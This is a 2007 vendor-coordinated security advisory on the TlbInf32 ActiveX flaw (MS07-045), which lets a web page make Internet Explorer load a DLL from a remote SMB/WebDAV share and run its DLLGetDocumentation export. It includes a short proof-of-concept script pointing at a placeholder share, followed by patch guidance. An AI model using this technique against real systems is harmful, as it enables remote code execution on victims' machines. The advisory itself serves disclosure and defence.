TlbInf32 ActiveX Command Execution
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=3D TlbInf32 ActiveX Command Execution
=3D
=3D MS Bulletin posted: =20
=3D http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
=3D
=3D Affected Software:
=3D Internet Explorer
=3D tlbInf32.dll
=3D vstlbinf.dll
=3D
=3D Public disclosure on Wednesday August 15, 2007
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The TypeLib Information object library , implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing=20
functionality easily accessible to both Visual Basic and C++
programmers.
Although it is not marked as safe for scripting in the registry, it does
implement IObjectSafety.
Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
The TypeLibInfoFromFile() function is used to open a file and retrieve
the
typelib information from it.
TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo
This function will accept a webdav/smb share to a DLL file, allowing the
retrieval of information from a DLL hosted on a remote server.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
TlbInf32.chm=20
Type libraries can contain help information for the library itself
(TypeLibInfo object), each TypeInfo (TypeInfo object), and each member
(MemberInfo object). This information is available in several
different=20
forms.
HelpString is the documentation string which appears as a short=20
description of the string in object browsers. If the optional LCID=20
(Language/Country identifier) is specified, then the returned string
is
localized if possible.
Documentation strings can be stored either in the type library
directly
or retrieved via a call to the DLLGetDocumentation entry point in the
Dll
specified by the HelpStringDll property.=20
=20
The HelpStringContext is passed to the HelpStringDll to get the
correct
documentation string for the object. The HelpStringDll and=20
HelpStringContext properties values are used automatically by the=20
HelpString property.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
If the DLL file specified in the call to TypeLibInfoFromFile() has been=20
modified to direct the HelpStringDll property to a DLL which exports
a malicious DLLGetDocumentation function, then this function will be=20
executed when a request for the HelpString property is made.=20
<object width=3D1000 height=3D20 classid=3D"CLSID:<CLASSID>"
name=3Dtest></object>
x=3D test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
=3D=3D Solutions =3D=3D
Install the vendor supplied patch.
http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
=3D=3D Credit =3D=3D
Discovered and advised to Microsoft November 23 2006 by Brett Moore of
Security-Assessment.com
As this is my last advisory release before I leave sa.com and head off=20
into the future, I gotta say thanx to the team there, its been a blast
guys.=20
All you kiwis overseas have you thought about a trip home.
www.kiwicon.org
+-SoSD-+